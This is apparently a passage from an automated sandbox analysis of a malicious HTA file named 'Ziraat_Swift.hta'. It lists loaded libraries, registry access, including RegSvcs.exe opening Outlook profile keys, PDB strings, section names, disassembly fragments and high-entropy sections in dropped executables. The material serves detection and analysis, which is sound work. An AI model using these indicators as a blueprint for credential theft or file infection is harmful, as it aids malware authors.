                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: webio.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: appvpolicy.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: wtsapi32.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: netapi32.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: wininet.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: samcli.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: logoncli.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AppVClient.exe | Section loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: tapi32.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: credui.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: fxstiff.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: fxsresm.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: ualapi.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtctm.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtcprx.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtclog.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: winmm.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: xolehlp.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: ktmw32.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: comres.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtcvsp1res.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxoci.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: oci.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: wkscli.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: cscapi.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: fwbase.dll
                  Source: C:\Windows\System32\msdtc.exe | Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: hid.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: dxgi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: devobj.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\Locator.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\Locator.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\Locator.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\Locator.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\Locator.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\Locator.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Locator.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: mfplat.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: rtworkq.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: windows.devices.perception.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: mediafoundation.defaultperceptionprovider.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: structuredquery.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: windows.globalization.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: icu.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: mswb7.dll
                  Source: C:\Windows\System32\SensorDataService.exe | Section loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: napinsp.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: wshbth.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\snmptrap.exe | Section loaded: winrnr.dll
                  Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Ziraat_Swift.hta | Static file information: File size 2325905 > 1048576
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: x.exe, 00000001.00000003.1727383425.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdbGCTL  source: x.exe, 00000001.00000003.1732725251.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb  source: alg.exe, 00000003.00000003.1807821969.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL  source: alg.exe, 00000003.00000003.2177924834.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb`  source: alg.exe, 00000003.00000003.1764935316.0000000001530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroCEF\AcroCEF.pdbI  source: alg.exe, 00000003.00000003.1844352415.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$  source: alg.exe, 00000003.00000003.2099445651.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb  source: alg.exe, 00000003.00000003.1862089697.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT  source: alg.exe, 00000003.00000003.1862089697.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: updater.pdb  source: alg.exe, 00000003.00000003.2384907802.00000000004A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb  source: alg.exe, 00000003.00000003.2161039074.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb)))  source: alg.exe, 00000003.00000003.1807821969.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb  source: x.exe, 00000001.00000003.1732725251.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb  source: alg.exe, 00000003.00000003.2099445651.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb  source: alg.exe, 00000003.00000003.2177924834.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroCEF\AcroCEF.pdb  source: alg.exe, 00000003.00000003.1844352415.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb  source: alg.exe, 00000003.00000003.1764935316.0000000001530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL  source: alg.exe, 00000003.00000003.2161039074.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                  Source: AppVClient.exe.1.dr  Static PE information: 0xE7EC34A7 [Sun Apr 19 22:01:11 2093 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00404B37 LoadLibraryA,GetProcAddress,1_2_00404B37
                  Source: armsvc.exe.1.dr  Static PE information: section name: .didat
                  Source: alg.exe.1.dr  Static PE information: section name: .didat
                  Source: GoogleCrashHandler64.exe.3.dr  Static PE information: section name: _RDATA
                  Source: GoogleCrashHandler64.exe.3.dr  Static PE information: section name: .gxfg
                  Source: GoogleCrashHandler64.exe.3.dr  Static PE information: section name: .gehcont
                  Source: elevation_service.exe.3.dr  Static PE information: section name: .00cfg
                  Source: elevation_service.exe.3.dr  Static PE information: section name: .gxfg
                  Source: elevation_service.exe.3.dr  Static PE information: section name: .retplne
                  Source: elevation_service.exe.3.dr  Static PE information: section name: _RDATA
                  Source: elevation_service.exe.3.dr  Static PE information: section name: malloc_h
                  Source: elevation_service.exe0.3.dr  Static PE information: section name: .00cfg
                  Source: elevation_service.exe0.3.dr  Static PE information: section name: .gxfg
                  Source: elevation_service.exe0.3.dr  Static PE information: section name: .retplne
                  Source: elevation_service.exe0.3.dr  Static PE information: section name: _RDATA
                  Source: elevation_service.exe0.3.dr  Static PE information: section name: malloc_h
                  Source: maintenanceservice.exe.3.dr  Static PE information: section name: .00cfg
                  Source: maintenanceservice.exe.3.dr  Static PE information: section name: .voltbl
                  Source: maintenanceservice.exe.3.dr  Static PE information: section name: _RDATA
                  Source: unpack200.exe.3.dr  Static PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.3.dr  Static PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.3.dr  Static PE information: section name: .gxfg
                  Source: ie_to_edge_stub.exe.3.dr  Static PE information: section name: .retplne
                  Source: ie_to_edge_stub.exe.3.dr  Static PE information: section name: _RDATA
                  Source: cookie_exporter.exe.3.dr  Static PE information: section name: .00cfg
                  Source: cookie_exporter.exe.3.dr  Static PE information: section name: .gxfg
                  Source: cookie_exporter.exe.3.dr  Static PE information: section name: .retplne
                  Source: cookie_exporter.exe.3.dr  Static PE information: section name: _RDATA
                  Source: identity_helper.exe.3.dr  Static PE information: section name: .00cfg
                  Source: identity_helper.exe.3.dr  Static PE information: section name: .gxfg
                  Source: identity_helper.exe.3.dr  Static PE information: section name: .retplne
                  Source: identity_helper.exe.3.dr  Static PE information: section name: _RDATA
                  Source: identity_helper.exe.3.dr  Static PE information: section name: malloc_h
                  Source: setup.exe.3.dr  Static PE information: section name: .00cfg
                  Source: setup.exe.3.dr  Static PE information: section name: .gxfg
                  Source: setup.exe.3.dr  Static PE information: section name: .retplne
                  Source: setup.exe.3.dr  Static PE information: section name: LZMADEC
                  Source: setup.exe.3.dr  Static PE information: section name: _RDATA
                  Source: setup.exe.3.dr  Static PE information: section name: malloc_h
                  Source: Acrobat.exe.3.dr  Static PE information: section name: .didat
                  Source: Acrobat.exe.3.dr  Static PE information: section name: _RDATA
                  Source: AcroCEF.exe.3.dr  Static PE information: section name: .didat
                  Source: AcroCEF.exe.3.dr  Static PE information: section name: _RDATA
                  Source: msedgewebview2.exe.3.dr  Static PE information: section name: .00cfg
                  Source: msedgewebview2.exe.3.dr  Static PE information: section name: .gxfg
                  Source: msedgewebview2.exe.3.dr  Static PE information: section name: .retplne
                  Source: msedgewebview2.exe.3.dr  Static PE information: section name: CPADinfo
                  Source: msedgewebview2.exe.3.dr  Static PE information: section name: LZMADEC
                  Source: msedgewebview2.exe.3.dr  Static PE information: section name: _RDATA
                  Source: msedgewebview2.exe.3.dr  Static PE information: section name: malloc_h
                  Source: msedge_proxy.exe.3.dr  Static PE information: section name: .00cfg
                  Source: msedge_proxy.exe.3.dr  Static PE information: section name: .gxfg
                  Source: msedge_proxy.exe.3.dr  Static PE information: section name: .retplne
                  Source: msedge_proxy.exe.3.dr  Static PE information: section name: _RDATA
                  Source: msedge_proxy.exe.3.dr  Static PE information: section name: malloc_h
                  Source: msedge_pwa_launcher.exe.3.dr  Static PE information: section name: .00cfg
                  Source: msedge_pwa_launcher.exe.3.dr  Static PE information: section name: .gxfg
                  Source: msedge_pwa_launcher.exe.3.dr  Static PE information: section name: .retplne
                  Source: msedge_pwa_launcher.exe.3.dr  Static PE information: section name: LZMADEC
                  Source: msedge_pwa_launcher.exe.3.dr  Static PE information: section name: _RDATA
                  Source: msedge_pwa_launcher.exe.3.dr  Static PE information: section name: malloc_h
                  Source: notification_click_helper.exe.3.dr  Static PE information: section name: .00cfg
                  Source: notification_click_helper.exe.3.dr  Static PE information: section name: .gxfg
                  Source: notification_click_helper.exe.3.dr  Static PE information: section name: .retplne
                  Source: notification_click_helper.exe.3.dr  Static PE information: section name: CPADinfo
                  Source: notification_click_helper.exe.3.dr  Static PE information: section name: _RDATA
                  Source: notification_click_helper.exe.3.dr  Static PE information: section name: malloc_h
                  Source: pwahelper.exe.3.dr  Static PE information: section name: .00cfg
                  Source: pwahelper.exe.3.dr  Static PE information: section name: .gxfg
                  Source: pwahelper.exe.3.dr  Static PE information: section name: .retplne
                  Source: pwahelper.exe.3.dr  Static PE information: section name: _RDATA
                  Source: pwahelper.exe.3.dr  Static PE information: section name: malloc_h
                  Source: msedge_proxy.exe0.3.dr  Static PE information: section name: .00cfg
                  Source: msedge_proxy.exe0.3.dr  Static PE information: section name: .gxfg
                  Source: msedge_proxy.exe0.3.dr  Static PE information: section name: .retplne
                  Source: msedge_proxy.exe0.3.dr  Static PE information: section name: _RDATA
                  Source: msedge_proxy.exe0.3.dr  Static PE information: section name: malloc_h
                  Source: pwahelper.exe0.3.dr  Static PE information: section name: .00cfg
                  Source: pwahelper.exe0.3.dr  Static PE information: section name: .gxfg
                  Source: pwahelper.exe0.3.dr  Static PE information: section name: .retplne
                  Source: pwahelper.exe0.3.dr  Static PE information: section name: _RDATA
                  Source: pwahelper.exe0.3.dr  Static PE information: section name: malloc_h
                  Source: MicrosoftEdgeUpdate.exe.3.dr  Static PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateBroker.exe.3.dr  Static PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr  Static PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr  Static PE information: section name: _RDATA
                  Source: SingleClientServicesUpdater.exe.3.dr  Static PE information: section name: .didat
                  Source: SingleClientServicesUpdater.exe.3.dr  Static PE information: section name: _RDATA
                  Source: AcroCEF.exe0.3.dr  Static PE information: section name: .didat
                  Source: AcroCEF.exe0.3.dr  Static PE information: section name: _RDATA
                  Source: SingleClientServicesUpdater.exe0.3.dr  Static PE information: section name: .didat
                  Source: SingleClientServicesUpdater.exe0.3.dr  Static PE information: section name: _RDATA
                  Source: MicrosoftEdgeUpdateCore.exe.3.dr  Static PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateOnDemand.exe.3.dr  Static PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateSetup.exe.3.dr  Static PE information: section name: .didat
                  Source: AppVLP.exe.3.dr  Static PE information: section name: .c2r
                  Source: OneDriveSetup.exe.3.dr  Static PE information: section name: .didat
                  Source: AdobeCollabSync.exe.3.dr  Static PE information: section name: .didat
                  Source: AdobeCollabSync.exe.3.dr  Static PE information: section name: _RDATA
                  Source: adobe_licensing_wf_acro.exe.3.dr  Static PE information: section name: _RDATA
                  Source: adobe_licensing_wf_helper_acro.exe.3.dr  Static PE information: section name: _RDATA
                  Source: 64BitMAPIBroker.exe.3.dr  Static PE information: section name: _RDATA
                  Source: MSRMSPIBroker.exe.3.dr  Static PE information: section name: .didat
                  Source: MSRMSPIBroker.exe.3.dr  Static PE information: section name: .msvcjmc
                  Source: Acrobat.exe0.3.dr  Static PE information: section name: .didat
                  Source: setup.exe0.3.dr  Static PE information: section name: .didat
                  Source: setup.exe0.3.dr  Static PE information: section name: _RDATA
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_0046848F push FFFFFF8Bh; iretd 1_2_00468491
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_0042E70F push edi; ret 1_2_0042E711
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_0042E828 push esi; ret 1_2_0042E82A
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00428945 push ecx; ret 1_2_00428958
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_0042EA03 push esi; ret 1_2_0042EA05
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_0042EAEC push edi; ret 1_2_0042EAEE
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00402F12 push es; retf 1_2_00402F13
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A7B180 push 00A7B0CAh; ret 1_2_00A7B061
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A7B180 push 00A7B30Dh; ret 1_2_00A7B1E6
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A7B180 push 00A7B2F2h; ret 1_2_00A7B262
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A7B180 push 00A7B255h; ret 1_2_00A7B2ED
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A7B180 push 00A7B2D0h; ret 1_2_00A7B346
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A7B180 push 00A7B37Fh; ret 1_2_00A7B3B7
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A7520C push 00A7528Fh; ret 1_2_00A7522D
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A9852Eh; ret 1_2_00A97F3A
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A98514h; ret 1_2_00A97F66
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A97E66h; ret 1_2_00A98057
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A9817Ah; ret 1_2_00A9808B
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A982E5h; ret 1_2_00A980D9
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A9826Ah; ret 1_2_00A9819E
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A9849Ch; ret 1_2_00A981E4
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A98321h; ret 1_2_00A982E0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A97FBFh; ret 1_2_00A9831F
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A97FA8h; ret 1_2_00A9834C
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A984BAh; ret 1_2_00A983E2
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A98426h; ret 1_2_00A984D8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A98075h; ret 1_2_00A984FD
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A9808Ch; ret 1_2_00A98512
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A98B6Fh; ret 1_2_00A98596
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A98E94h; ret 1_2_00A985C9
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  Code function: 1_2_00A98550 push 00A9878Bh; ret 1_2_00A98734
                  Source: x.exe.0.dr  Static PE information: section name: .reloc entropy: 7.931596244367975
                  Source: AppVClient.exe.1.dr  Static PE information: section name: .reloc entropy: 7.935635818408811
                  Source: differences.exe.1.dr  Static PE information: section name: .reloc entropy: 7.931596244367975
                  Source: AutoIt3_x64.exe.3.dr  Static PE information: section name: .reloc entropy: 7.943921958907293
                  Source: SciTE.exe.3.dr  Static PE information: section name: .reloc entropy: 7.912322861829115
                  Source: jucheck.exe.3.dr  Static PE information: section name: .reloc entropy: 7.931076642944994
                  Source: jusched.exe.3.dr  Static PE information: section name: .reloc entropy: 7.936039619719061
                  Source: elevation_service.exe.3.dr  Static PE information: section name: .reloc entropy: 7.943937015504037
                  Source: elevation_service.exe0.3.dr  Static PE information: section name: .reloc entropy: 7.945952439170769
                  Source: 7zFM.exe.3.dr  Static PE information: section name: .reloc entropy: 7.93213395966444
                  Source: identity_helper.exe.3.dr  Static PE information: section name: .reloc entropy: 7.940745738576045
                  Source: setup.exe.3.dr  Static PE information: section name: .reloc entropy: 7.944734088789118
                  Source: 7zG.exe.3.dr  Static PE information: section name: .reloc entropy: 7.927681994996245
                  Source: Acrobat.exe.3.dr  Static PE information: section name: .reloc entropy: 7.940537726504902
                  Source: AcroCEF.exe.3.dr  Static PE information: section name: .reloc entropy: 7.937561085260742
                  Source: msedgewebview2.exe.3.dr  Static PE information: section name: .reloc entropy: 7.936576878025424
                  Source: msedge_proxy.exe.3.dr  Static PE information: section name: .reloc entropy: 7.942268501725781
                  Source: msedge_pwa_launcher.exe.3.dr  Static PE information: section name: .reloc entropy: 7.9462623526249425
                  Source: notification_click_helper.exe.3.dr  Static PE information: section name: .reloc entropy: 7.944018645209311
                  Source: pwahelper.exe.3.dr  Static PE information: section name: .reloc entropy: 7.94089917169034
                  Source: msedge_proxy.exe0.3.dr  Static PE information: section name: .reloc entropy: 7.942260650274214
                  Source: pwahelper.exe0.3.dr  Static PE information: section name: .reloc entropy: 7.940890321085322
                  Source: SingleClientServicesUpdater.exe.3.dr  Static PE information: section name: .reloc entropy: 7.943702236613648
                  Source: AcroCEF.exe0.3.dr  Static PE information: section name: .reloc entropy: 7.9375616415242405
                  Source: SingleClientServicesUpdater.exe0.3.dr  Static PE information: section name: .reloc entropy: 7.943707433623585
                  Source: MicrosoftEdgeUpdateSetup.exe.3.dr  Static PE information: section name: .reloc entropy: 7.939190403002679
                  Source: OneDriveSetup.exe.3.dr  Static PE information: section name: .reloc entropy: 7.863774915045104
                  Source: Integrator.exe.3.dr  Static PE information: section name: .reloc entropy: 7.759916849983244
                  Source: ADNotificationManager.exe.3.dr  Static PE information: section name: .reloc entropy: 7.936842384871835
